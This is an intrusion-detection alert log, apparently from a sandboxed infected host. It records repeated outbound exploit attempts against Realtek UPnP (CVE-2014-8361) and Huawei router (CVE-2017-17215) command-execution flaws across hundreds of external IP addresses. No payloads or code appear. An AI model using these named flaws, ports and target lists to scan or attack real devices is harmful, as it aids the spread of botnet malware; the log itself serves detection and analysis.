                                      07/20/24-23:01:44.277250TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24560052869192.168.2.2399.220.126.213
                                      07/20/24-23:02:20.374641TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3862052869192.168.2.23138.173.140.141
                                      07/20/24-23:01:34.044537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5019637215192.168.2.23220.35.159.72
                                      07/20/24-23:01:42.187124TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4910052869192.168.2.231.84.241.246
                                      07/20/24-23:01:51.016561TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614687052869192.168.2.2370.60.237.131
                                      07/20/24-23:01:31.986571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605037215192.168.2.23209.95.190.72
                                      07/20/24-23:01:47.403768TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615896452869192.168.2.2313.193.24.191
                                      07/20/24-23:01:21.928521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4274237215192.168.2.2375.171.235.169
                                      07/20/24-23:01:46.004063TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614094252869192.168.2.2359.99.39.216
                                      07/20/24-23:01:46.485082TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25667652869192.168.2.23120.189.67.125
                                      07/20/24-23:01:11.662969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4866437215192.168.2.23197.193.26.103
                                      07/20/24-23:01:11.635828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6056637215192.168.2.2341.44.82.133
                                      07/20/24-23:01:42.276860TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23498652869192.168.2.2370.124.249.51
                                      07/20/24-23:01:24.889163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471837215192.168.2.23157.178.234.164
                                      07/20/24-23:01:05.007557TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5488452869192.168.2.23105.183.167.212
                                      07/20/24-23:01:34.046616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6077637215192.168.2.23102.164.167.66
                                      07/20/24-23:01:41.533244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5751452869192.168.2.23218.79.146.2
                                      07/20/24-23:01:53.281781TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23901452869192.168.2.23162.69.127.248
                                      07/20/24-23:01:40.307219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4725637215192.168.2.23197.19.231.74
                                      07/20/24-23:01:42.290838TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4335652869192.168.2.23123.147.61.106
                                      07/20/24-23:01:56.768240TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24352052869192.168.2.23210.84.36.218
                                      07/20/24-23:01:43.071126TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4297652869192.168.2.23213.170.177.158
                                      07/20/24-23:01:45.452336TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23946652869192.168.2.2363.211.43.107
                                      07/20/24-23:01:08.693187TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4112252869192.168.2.23159.70.111.204
                                      07/20/24-23:01:42.430595TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4618252869192.168.2.23163.49.61.251
                                      07/20/24-23:01:04.050503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3864637215192.168.2.23157.139.23.30
                                      07/20/24-23:01:02.432131TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613356052869192.168.2.238.98.158.174
                                      07/20/24-23:01:24.916250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5930037215192.168.2.2341.119.245.174
                                      07/20/24-23:01:27.653309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671037215192.168.2.23197.70.205.23
                                      07/20/24-23:01:51.056493TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613690652869192.168.2.2370.101.195.243
                                      07/20/24-23:01:43.895587TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3351852869192.168.2.2357.222.50.62
                                      07/20/24-23:01:42.930628TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614027252869192.168.2.23155.96.29.107
                                      07/20/24-23:01:48.386032TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615459452869192.168.2.2327.248.134.22
                                      07/20/24-23:01:01.473903TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615287252869192.168.2.23173.57.134.38
                                      07/20/24-23:01:42.670071TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5512452869192.168.2.23197.159.127.103
                                      07/20/24-23:01:48.108304TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24339852869192.168.2.2391.225.198.252
                                      07/20/24-23:01:08.598416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3836452869192.168.2.232.10.234.63
                                      07/20/24-23:01:41.488676TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614714052869192.168.2.2370.133.231.223
                                      07/20/24-23:01:42.325814TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3514852869192.168.2.23192.18.152.238
                                      07/20/24-23:01:46.247879TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614563052869192.168.2.23131.27.111.80
                                      07/20/24-23:01:45.096837TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4192652869192.168.2.23167.73.249.89
                                      07/20/24-23:01:24.862410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5181837215192.168.2.23197.233.164.3
                                      07/20/24-23:01:06.975117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510837215192.168.2.23197.162.44.242
                                      07/20/24-23:01:42.703494TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4683652869192.168.2.23130.201.79.70
                                      07/20/24-23:01:43.845332TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23689652869192.168.2.23137.51.1.150
                                      07/20/24-23:01:02.083467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066037215192.168.2.2341.229.154.58
                                      07/20/24-23:01:42.915640TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3286252869192.168.2.2312.188.189.35
                                      07/20/24-23:01:41.290281TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6079652869192.168.2.2352.64.207.91
                                      07/20/24-23:01:56.327422TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5223652869192.168.2.2364.44.223.6
                                      07/20/24-23:01:13.811792TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613703452869192.168.2.23151.154.71.43
                                      07/20/24-23:01:08.638880TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3802452869192.168.2.23103.18.195.93
                                      07/20/24-23:01:25.476673TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3900852869192.168.2.23146.105.181.156
                                      07/20/24-23:01:47.342227TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3838052869192.168.2.23105.139.214.54
                                      07/20/24-23:01:44.855022TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23560052869192.168.2.23203.80.83.187
                                      07/20/24-23:00:59.203960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3790637215192.168.2.2341.53.184.177
                                      07/20/24-23:01:10.691725TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5268852869192.168.2.23166.63.2.220
                                      07/20/24-23:01:42.622797TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615047652869192.168.2.23173.58.223.243
                                      07/20/24-23:01:44.481011TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4351052869192.168.2.23153.239.16.237
                                      07/20/24-23:01:08.598416TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25773452869192.168.2.23183.49.28.217
                                      07/20/24-23:01:34.048618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5820437215192.168.2.2341.241.253.254
                                      07/20/24-23:01:45.034156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5895452869192.168.2.23132.191.84.86
                                      07/20/24-23:02:09.758048TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5330852869192.168.2.23164.236.61.179
                                      07/20/24-23:01:52.286078TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5549252869192.168.2.23190.122.87.133
                                      07/20/24-23:02:48.156942TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614673052869192.168.2.23159.73.240.193
                                      07/20/24-23:01:43.918137TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613560452869192.168.2.23199.106.155.17
                                      07/20/24-23:01:02.426129TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4847252869192.168.2.23203.236.42.147
                                      07/20/24-23:01:48.855306TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25937652869192.168.2.23152.241.189.22
                                      07/20/24-23:01:49.703914TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614141052869192.168.2.23126.214.32.228
                                      07/20/24-23:01:41.290518TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614186652869192.168.2.2312.129.173.144
                                      07/20/24-23:01:54.835427TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5148852869192.168.2.23105.84.86.167
                                      07/20/24-23:01:41.295717TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614129052869192.168.2.23175.125.31.24
                                      07/20/24-23:01:12.813695TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25742252869192.168.2.23112.132.188.245
                                      07/20/24-23:01:41.286911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5245652869192.168.2.2354.140.169.156
                                      07/20/24-23:01:20.126052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3874237215192.168.2.23157.202.161.192
                                      07/20/24-23:01:20.591702TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23592652869192.168.2.23191.208.79.121
                                      07/20/24-23:01:44.826234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4217252869192.168.2.235.118.234.148
                                      07/20/24-23:01:08.663244TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24173652869192.168.2.23119.8.134.128
                                      07/20/24-23:01:52.081188TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614007652869192.168.2.232.18.140.250
                                      07/20/24-23:01:53.068033TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613748452869192.168.2.23125.227.195.47
                                      07/20/24-23:00:59.163619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056037215192.168.2.23157.213.175.190
                                      07/20/24-23:01:41.637960TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4070652869192.168.2.2395.50.29.160
                                      07/20/24-23:02:08.008782TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3742652869192.168.2.23133.167.87.211
                                      07/20/24-23:01:27.655551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5421037215192.168.2.23197.122.89.119
                                      07/20/24-23:01:08.578116TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4438452869192.168.2.23159.20.45.153
                                      07/20/24-23:01:59.593868TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614620652869192.168.2.2342.127.253.166
                                      07/20/24-23:01:51.244491TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614548252869192.168.2.23202.112.172.229
                                      07/20/24-23:01:04.802341TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3509052869192.168.2.2399.2.133.89
                                      07/20/24-23:02:08.781934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4246052869192.168.2.2314.40.33.153
                                      07/20/24-23:01:00.633744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3764237215192.168.2.23157.54.130.2
                                      07/20/24-23:01:44.565131TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24194052869192.168.2.23179.51.3.253
                                      07/20/24-23:02:06.813916TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3486452869192.168.2.23185.209.39.214
                                      07/20/24-23:01:31.312736TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24559052869192.168.2.23111.38.32.209
                                      07/20/24-23:01:43.175740TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25395452869192.168.2.23162.142.171.159
                                      07/20/24-23:01:45.980258TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23284052869192.168.2.2397.24.147.38
                                      07/20/24-23:01:47.808098TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614415252869192.168.2.2349.245.141.79
                                      07/20/24-23:01:25.974900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3923252869192.168.2.2384.102.198.205
                                      07/20/24-23:01:57.720327TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4988052869192.168.2.2370.7.126.6
                                      07/20/24-23:01:07.066373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4094437215192.168.2.2341.137.223.0
                                      07/20/24-23:01:58.624224TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25439252869192.168.2.23101.35.135.206
                                      07/20/24-23:01:42.751499TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4876252869192.168.2.2362.0.251.178
                                      07/20/24-23:01:53.059915TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614783252869192.168.2.2319.90.99.238
                                      07/20/24-23:01:45.713934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4739652869192.168.2.238.220.8.58
                                      07/20/24-23:01:56.910590TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23784052869192.168.2.2386.115.200.136
                                      07/20/24-23:01:47.748808TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3330852869192.168.2.23145.1.23.220
                                      07/20/24-23:01:46.125172TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5696852869192.168.2.23115.176.151.108
                                      07/20/24-23:01:34.050313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3742837215192.168.2.23218.167.11.105
                                      07/20/24-23:01:44.546338TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5795452869192.168.2.23203.253.92.60
                                      07/20/24-23:01:51.932550TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23590652869192.168.2.23203.130.71.37
                                      07/20/24-23:01:42.142802TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614661652869192.168.2.23209.170.78.160
                                      07/20/24-23:01:55.384732TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615148252869192.168.2.23178.69.5.63
                                      07/20/24-23:00:59.211046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3344437215192.168.2.23197.168.86.78
                                      07/20/24-23:01:03.942398TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3413652869192.168.2.2365.114.239.111
                                      07/20/24-23:01:12.807585TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3797252869192.168.2.232.129.228.59
                                      07/20/24-23:01:42.027932TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4059652869192.168.2.23130.186.238.85
                                      07/20/24-23:01:44.320661TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23423652869192.168.2.23218.234.180.136
                                      07/20/24-23:01:02.048113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237437215192.168.2.2361.78.107.95
                                      07/20/24-23:01:43.328791TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4980052869192.168.2.2341.199.13.54
                                      07/20/24-23:01:45.143033TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3725052869192.168.2.2357.114.247.43
                                      07/20/24-23:01:53.354788TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4096252869192.168.2.2389.150.205.193
                                      07/20/24-23:01:08.939279TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3389052869192.168.2.23133.66.91.121
                                      07/20/24-23:01:52.161851TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5017852869192.168.2.23194.242.148.126
                                      07/20/24-23:01:04.098909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4633037215192.168.2.2341.250.23.107
                                      07/20/24-23:01:08.629616TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4494652869192.168.2.23180.155.132.167
                                      07/20/24-23:01:27.650643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5068037215192.168.2.2341.32.198.246
                                      07/20/24-23:01:50.001370TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23689652869192.168.2.2396.24.157.5
                                      07/20/24-23:00:57.222523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4944637215192.168.2.23199.229.94.109
                                      07/20/24-23:01:11.818830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737637215192.168.2.2341.201.122.237
                                      07/20/24-23:01:50.065539TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3487852869192.168.2.2334.116.171.252
                                      07/20/24-23:01:04.031511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552437215192.168.2.23197.231.152.31
                                      07/20/24-23:01:08.630327TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4639252869192.168.2.2338.158.187.83
                                      07/20/24-23:01:12.853279TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25253652869192.168.2.23223.86.47.43
                                      07/20/24-23:01:45.521019TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3443252869192.168.2.2337.165.17.202
                                      07/20/24-23:01:47.562957TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613725252869192.168.2.2347.13.214.247
                                      07/20/24-23:01:34.050313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357637215192.168.2.23206.22.143.145
                                      07/20/24-23:01:20.591702TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4061252869192.168.2.2394.32.208.135
                                      07/20/24-23:01:24.876750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3754037215192.168.2.23197.170.255.190
                                      07/20/24-23:01:53.132473TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4360252869192.168.2.23110.244.30.5
                                      07/20/24-23:01:26.115620TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5119052869192.168.2.2360.163.17.129
                                      07/20/24-23:01:43.498156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4755052869192.168.2.2345.122.145.145
                                      07/20/24-23:01:42.683079TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23869252869192.168.2.2351.209.215.233
                                      07/20/24-23:01:44.439012TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4884452869192.168.2.23108.225.154.233
                                      07/20/24-23:01:01.404325TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5497652869192.168.2.23151.5.114.8
                                      07/20/24-23:01:44.340422TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3960052869192.168.2.23123.6.144.179
                                      07/20/24-23:01:41.305474TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5096652869192.168.2.2339.181.131.100
                                      07/20/24-23:01:46.571223TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23495052869192.168.2.23132.171.123.209
                                      07/20/24-23:01:40.321300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5429237215192.168.2.23197.176.61.239
                                      07/20/24-23:01:48.901809TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23425252869192.168.2.2367.14.83.223
                                      07/20/24-23:01:51.576561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4987852869192.168.2.23102.31.132.7
                                      07/20/24-23:01:47.455724TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26099852869192.168.2.2338.85.208.126
                                      07/20/24-23:01:51.835178TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3804252869192.168.2.2364.111.30.226
                                      07/20/24-23:01:03.270954TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4138652869192.168.2.2378.200.30.164
                                      07/20/24-23:01:43.084243TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614904452869192.168.2.23128.197.233.56
                                      07/20/24-23:01:49.033216TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614775052869192.168.2.231.7.30.66
                                      07/20/24-23:01:24.882291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4976437215192.168.2.2341.253.111.233
                                      07/20/24-23:01:08.639622TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25087452869192.168.2.23203.236.42.147
                                      07/20/24-23:01:47.117979TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613742652869192.168.2.2362.238.174.13
                                      07/20/24-23:01:14.146543TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4548852869192.168.2.23178.124.248.177
                                      07/20/24-23:01:52.720788TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5693452869192.168.2.23161.89.104.148
                                      07/20/24-23:01:51.086033TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5905052869192.168.2.23193.18.125.219
                                      07/20/24-23:01:03.834044TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615797852869192.168.2.23128.89.159.185
                                      07/20/24-23:01:05.000501TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613941652869192.168.2.234.114.3.131
                                      07/20/24-23:01:41.328263TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613589252869192.168.2.23106.27.196.147
                                      07/20/24-23:01:34.060991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4763237215192.168.2.23157.1.189.223
                                      07/20/24-23:01:40.279669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4379837215192.168.2.23197.215.73.79
                                      07/20/24-23:01:44.455702TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4568852869192.168.2.23207.214.48.137
                                      07/20/24-23:01:51.875785TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5408052869192.168.2.2376.116.108.138
                                      07/20/24-23:01:56.991428TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5314452869192.168.2.2363.226.8.25
                                      07/20/24-23:01:59.449569TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614885052869192.168.2.2357.22.35.81
                                      07/20/24-23:01:43.918790TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25811252869192.168.2.2317.63.153.183
                                      07/20/24-23:01:56.579360TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23933652869192.168.2.23120.153.158.217
                                      07/20/24-23:01:44.950737TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5188652869192.168.2.23221.199.165.178
                                      07/20/24-23:01:52.972472TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616087052869192.168.2.23129.173.36.90
                                      07/20/24-23:01:46.025818TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4445852869192.168.2.2384.203.232.104
                                      07/20/24-23:01:41.383466TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4831652869192.168.2.23103.68.36.118
                                      07/20/24-23:01:24.933370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4182837215192.168.2.23181.98.41.184
                                      07/20/24-23:01:34.060991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4331237215192.168.2.2363.249.161.117
